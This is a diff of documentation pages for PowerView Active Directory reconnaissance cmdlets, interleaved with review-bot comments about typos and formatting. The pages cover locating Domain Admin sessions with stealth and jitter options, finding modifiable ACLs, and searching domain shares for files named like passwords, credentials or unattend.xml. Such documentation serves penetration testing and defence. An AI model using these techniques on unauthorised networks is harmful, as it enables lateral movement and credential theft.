+Find-DomainUserLocation -Domain testlab.local -Credential $Cred
+
+Searches for domain admin locations in the testlab.local using the specified alternate credentials.
+
+## PARAMETERS
+
+### -ComputerName
+Specifies an array of one or more hosts to enumerate, passable on the pipeline.
+If -ComputerName is not passed, the default behavior is to enumerate all machines
+in the domain returned by Get-DomainComputer.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DNSHostName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to query for computers AND users, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerDomain
+Specifies the domain to query for computers, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerLDAPFilter
+Specifies an LDAP query string that is used to search for computer objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSearchBase
+Specifies the LDAP source to search through for computers,
+e.g.
+"LDAP://OU=secret,DC=testlab,DC=local".
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerUnconstrained
+Switch.
+Search computer objects that have unconstrained delegation.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: Unconstrained
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerOperatingSystem
+Search computers with a specific operating system, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: OperatingSystem
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerServicePack
+Search computers with a specific service pack, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ServicePack
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSiteName
+Search computers in the specific AD Site name, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: SiteName
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserIdentity
+Specifies one or more user identities to search for.
+
+```yaml
+Type: String[]
+Parameter Sets: UserIdentity
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserDomain
+Specifies the domain to query for users to search for, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserLDAPFilter
+Specifies an LDAP query string that is used to search for target users.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserSearchBase
+Specifies the LDAP source to search through for target users.
+e.g.
+"LDAP://OU=secret,DC=testlab,DC=local".
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserGroupIdentity
+Specifies a group identity to query for target users, defaults to 'Domain Admins.
+If any other user specifications are set, then UserGroupIdentity is ignored.
+
+```yaml
+Type: String[]
+Parameter Sets: UserGroupIdentity
+Aliases: GroupName, Group
+
+Required: False
+Position: Named
+Default value: Domain Admins
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserAdminCount
+Switch.
+Search for users users with '(adminCount=1)' (meaning are/were privileged).
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: AdminCount
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserAllowDelegation
+Switch.
+Search for user accounts that are not marked as 'sensitive and not allowed for delegation'.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: AllowDelegation
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -CheckAccess
+Switch.
+Check if the current user has local admin access to computers where target users are found.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain and target systems.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -StopOnSuccess
+Switch.
+Stop hunting after finding after finding a target user.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Delay
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Jitter
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
+
+```yaml
+Type: Double
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0.3
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ShowAll
+Switch.
+Return all user location results instead of filtering based on target
+specifications.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: ShowAll
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Stealth
+Switch.
+Only enumerate sessions from connonly used target servers.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -StealthSource
+The source of target servers to use, 'DFS' (distributed file servers),
+'DC' (domain controllers), 'File' (file servers), or 'All' (the default).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: All
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Threads
+The number of threads to use for user searching, defaults to 20.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 20
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.UserLocation
+
+## NOTES
+
+## RELATED LINKS
+
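Review bot: Example 4 closes its fence after the first line, so `$Cred = New-Object ...` and `Find-DomainUserLocation -Domain testlab.local -Credential $Cred` render as prose; move the closing ``` below the last command, and "in the testlab.local using" in its caption is missing the word "domain". In DESCRIPTION, "with Get-NetSession/Get-NetLoggedon The found user list" is missing a period between the sentences and "highly-trafficed" should be "highly-trafficked"; under -Stealth, "connonly used" should be "commonly used". The -StealthSource gloss "'DFS' (distributed file servers)" does not match the dependency it relies on (Get-DomainDFSShare); DFS here means Distributed File System share hosts, so say that. Repeated from the other files in this patch: "'Domain Admins." lacks its closing quote under -UserGroupIdentity, "users users" under -UserAdminCount, "after finding after finding" under -StopOnSuccess, and -ServerTimeLimit says "Default of 120 seconds." while its YAML block says "Default value: 0".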
diff --git a/docs/Recon/Find-InterestingDomainAcl.md b/docs/Recon/Find-InterestingDomainAcl.md new file mode 100755 index 0000000..eeda73a --- /dev/null +++ b/docs/Recon/Find-InterestingDomainAcl.md @@ -0,0 +1,239 @@ +# Find-InterestingDomainAcl
+
+## SYNOPSIS
+Finds object ACLs in the current (or specified) domain with modification
+rights set to non-built in objects.
+
+Thanks Sean Metcalf (@pyrotek3) for the idea and guidance.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainObjectAcl, Get-DomainObject, Convert-ADName
+
+## SYNTAX
+
+```
+Find-InterestingDomainAcl [[-Domain] <String>] [-ResolveGUIDs] [-RightsFilter <String>] [-LDAPFilter <String>]
+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function enumerates the ACLs for every object in the domain with Get-DomainObjectAcl,
+and for each returned ACE entry it checks if principal security identifier
+is *-1000 (meaning the account is not built in), and also checks if the rights for
+the ACE mean the object can be modified by the principal.
+If these conditions are met,
+then the security identifier SID is translated, the domain object is retrieved, and
+additional IdentityReference* information is appended to the output object.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-InterestingDomainAcl
+```
+
+Finds interesting object ACLS in the current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Find-InterestingDomainAcl -Domain dev.testlab.local -ResolveGUIDs
+```
+
+Finds interesting object ACLS in the ev.testlab.local domain and
+resolves rights GUIDs to display names.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-InterestingDomainAcl -Credential $Cred -ResolveGUIDs
+
+## PARAMETERS
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainName, Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -ResolveGUIDs
+Switch.
+Resolve GUIDs to their display names.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -RightsFilter
+{{Fill RightsFilter Description}}
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.ACL
+
+Custom PSObject with ACL entries.
+
+## NOTES
+
+## RELATED LINKS
+
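Review bot: the -RightsFilter section still carries the unfilled placeholder "{{Fill RightsFilter Description}}"; this should be replaced with the accepted filter values before the page ships, since the DESCRIPTION only says ACEs are kept when "the rights for the ACE mean the object can be modified" and gives the reader no way to narrow that. Three smaller points in the same file: the EXAMPLE 2 explanation says "ev.testlab.local" while the command uses dev.testlab.local; the EXAMPLE 3 code fence closes after the ConvertTo-SecureString line, so "$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)" and "Find-InterestingDomainAcl -Credential $Cred -ResolveGUIDs" render as unfenced prose; and -ServerTimeLimit states "Default of 120 seconds." while its metadata block reports "Default value: 0", so one of the two should be reconciled (or the description should say what an unset value means).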
diff --git a/docs/Recon/Find-InterestingDomainShareFile.md b/docs/Recon/Find-InterestingDomainShareFile.md new file mode 100755 index 0000000..511510f --- /dev/null +++ b/docs/Recon/Find-InterestingDomainShareFile.md @@ -0,0 +1,463 @@ +# Find-InterestingDomainShareFile
+
+## SYNOPSIS
+Searches for files matching specific criteria on readable shares
+in the domain.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetShare, Find-InterestingFile, New-ThreadedFunction
+
+## SYNTAX
+
+### FileSpecification (Default)
+```
+Find-InterestingDomainShareFile [[-ComputerName] <String[]>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>]
+ [-ComputerServicePack <String>] [-ComputerSiteName <String>] [-Include <String[]>] [-SharePath <String[]>]
+ [-ExcludedShares <String[]>] [-LastAccessTime <DateTime>] [-LastWriteTime <DateTime>]
+ [-CreationTime <DateTime>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>] [-Delay <Int32>] [-Jitter <Double>]
+ [-Threads <Int32>]
+```
+
+### OfficeDocs
+```
+Find-InterestingDomainShareFile [[-ComputerName] <String[]>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>]
+ [-ComputerServicePack <String>] [-ComputerSiteName <String>] [-SharePath <String[]>]
+ [-ExcludedShares <String[]>] [-OfficeDocs] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+ [-Delay <Int32>] [-Jitter <Double>] [-Threads <Int32>]
+```
+
+### FreshEXEs
+```
+Find-InterestingDomainShareFile [[-ComputerName] <String[]>] [-ComputerDomain <String>]
+ [-ComputerLDAPFilter <String>] [-ComputerSearchBase <String>] [-ComputerOperatingSystem <String>]
+ [-ComputerServicePack <String>] [-ComputerSiteName <String>] [-SharePath <String[]>]
+ [-ExcludedShares <String[]>] [-FreshEXEs] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>] [-Delay <Int32>] [-Jitter <Double>]
+ [-Threads <Int32>]
+```
+
+## DESCRIPTION
+This function enumerates all machines on the current (or specified) domain
+using Get-DomainComputer, and enumerates the available shares for each
+machine with Get-NetShare.
+It will then use Find-InterestingFile on each
+readhable share, searching for files marching specific criteria.
+If -Credential
+is passed, then Invoke-UserImpersonation is used to impersonate the specified
+user before enumeration, reverting after with Invoke-RevertToSelf.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-InterestingDomainShareFile
+```
+
+Finds 'interesting' files on the current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Find-InterestingDomainShareFile -ComputerName @('windows1.testlab.local','windows2.testlab.local')
+```
+
+Finds 'interesting' files on readable shares on the specified systems.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('DEV\dfm.a', $SecPassword)
+Find-DomainShare -Domain testlab.local -Credential $Cred
+
+Searches interesting files in the testlab.local domain using the specified alternate credentials.
+
+## PARAMETERS
+
+### -ComputerName
+Specifies an array of one or more hosts to enumerate, passable on the pipeline.
+If -ComputerName is not passed, the default behavior is to enumerate all machines
+in the domain returned by Get-DomainComputer.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DNSHostName
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -ComputerDomain
+Specifies the domain to query for computers, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerLDAPFilter
+Specifies an LDAP query string that is used to search for computer objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSearchBase
+Specifies the LDAP source to search through for computers,
+e.g.
+"LDAP://OU=secret,DC=testlab,DC=local".
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerOperatingSystem
+Search computers with a specific operating system, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: OperatingSystem
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerServicePack
+Search computers with a specific service pack, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ServicePack
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ComputerSiteName
+Search computers in the specific AD Site name, wildcards accepted.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: SiteName
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Include
+Only return files/folders that match the specified array of strings,
+i.e.
+@(*.doc*, *.xls*, *.ppt*)
+
+```yaml
+Type: String[]
+Parameter Sets: FileSpecification
+Aliases: SearchTerms, Terms
+
+Required: False
+Position: Named
+Default value: @('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config')
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SharePath
+Specifies one or more specific share paths to search, in the form \\\\COMPUTER\Share
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: Share
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ExcludedShares
+Specifies share paths to exclude, default of C$, Admin$, Print$, IPC$.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: @('C$', 'Admin$', 'Print$', 'IPC$')
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LastAccessTime
+Only return files with a LastAccessTime greater than this date value.
+
+```yaml
+Type: DateTime
+Parameter Sets: FileSpecification
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LastWriteTime
+Only return files with a LastWriteTime greater than this date value.
+
+```yaml
+Type: DateTime
+Parameter Sets: FileSpecification
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -CreationTime
+Only return files with a CreationTime greater than this date value.
+
+```yaml
+Type: DateTime
+Parameter Sets: FileSpecification
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -OfficeDocs
+Switch.
+Search for office documents (*.doc*, *.xls*, *.ppt*)
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: OfficeDocs
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FreshEXEs
+Switch.
+Find .EXEs accessed within the last 7 days.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: FreshEXEs
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain and target systems.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Delay
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Jitter
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
+
+```yaml
+Type: Double
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0.3
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Threads
+The number of threads to use for user searching, defaults to 20.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 20
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.FoundFile
+
+## NOTES
+
+## RELATED LINKS
+
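Review bot: EXAMPLE 3 invokes the wrong function and a parameter this function does not declare: "Find-DomainShare -Domain testlab.local -Credential $Cred" should call Find-InterestingDomainShareFile, and the SYNTAX blocks list -ComputerDomain rather than -Domain, so the example as written would not run against this cmdlet. Also in this file: the DESCRIPTION's "readhable share, searching for files marching specific criteria" should be "readable" and "matching"; the -Threads description "The number of threads to use for user searching" does not fit a share/file search and should say so; and the -Include text "i.e. @(*.doc*, *.xls*, *.ppt*)" gives an example, so "e.g." is the right abbreviation. The EXAMPLE 3 fence also closes after its first line, leaving the "$Cred = ..." and "Find-DomainShare ..." lines outside the code block.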
diff --git a/docs/Recon/Find-InterestingFile.md b/docs/Recon/Find-InterestingFile.md new file mode 100755 index 0000000..2fe6abf --- /dev/null +++ b/docs/Recon/Find-InterestingFile.md @@ -0,0 +1,248 @@ +# Find-InterestingFile
+
+## SYNOPSIS
+Searches for files on the given path that match a series of specified criteria.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection
+
+## SYNTAX
+
+### FileSpecification (Default)
+```
+Find-InterestingFile [[-Path] <String[]>] [-Include <String[]>] [-LastAccessTime <DateTime>]
+ [-LastWriteTime <DateTime>] [-CreationTime <DateTime>] [-ExcludeFolders] [-ExcludeHidden] [-CheckWriteAccess]
+ [-Credential <PSCredential>]
+```
+
+### OfficeDocs
+```
+Find-InterestingFile [[-Path] <String[]>] [-OfficeDocs] [-CheckWriteAccess] [-Credential <PSCredential>]
+```
+
+### FreshEXEs
+```
+Find-InterestingFile [[-Path] <String[]>] [-FreshEXEs] [-CheckWriteAccess] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function recursively searches a given UNC path for files with
+specific keywords in the name (default of pass, sensitive, secret, admin,
+login and unattend*.xml).
+By default, hidden files/folders are included
+in search results.
+If -Credential is passed, Add-RemoteConnection/Remove-RemoteConnection
+is used to temporarily map the remote share.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Find-InterestingFile -Path "C:\Backup\"
+```
+
+Returns any files on the local path C:\Backup\ that have the default
+search term set in the title.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Find-InterestingFile -Path "\\WINDOWS7\Users\" -LastAccessTime (Get-Date).AddDays(-7)
+```
+
+Returns any files on the remote path \\\\WINDOWS7\Users\ that have the default
+search term set in the title and were accessed within the last week.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-InterestingFile -Credential $Cred -Path "\\\\PRIMARY.testlab.local\C$\Temp\"
+
+## PARAMETERS
+
+### -Path
+UNC/local path to recursively search.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: .\
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Include
+Only return files/folders that match the specified array of strings,
+i.e.
+@(*.doc*, *.xls*, *.ppt*)
+
+```yaml
+Type: String[]
+Parameter Sets: FileSpecification
+Aliases: SearchTerms, Terms
+
+Required: False
+Position: Named
+Default value: @('*password*', '*sensitive*', '*admin*', '*login*', '*secret*', 'unattend*.xml', '*.vmdk', '*creds*', '*credential*', '*.config')
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LastAccessTime
+Only return files with a LastAccessTime greater than this date value.
+
+```yaml
+Type: DateTime
+Parameter Sets: FileSpecification
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LastWriteTime
+Only return files with a LastWriteTime greater than this date value.
+
+```yaml
+Type: DateTime
+Parameter Sets: FileSpecification
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -CreationTime
+Only return files with a CreationTime greater than this date value.
+
+```yaml
+Type: DateTime
+Parameter Sets: FileSpecification
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -OfficeDocs
+Switch.
+Search for office documents (*.doc*, *.xls*, *.ppt*)
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: OfficeDocs
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FreshEXEs
+Switch.
+Find .EXEs accessed within the last 7 days.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: FreshEXEs
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
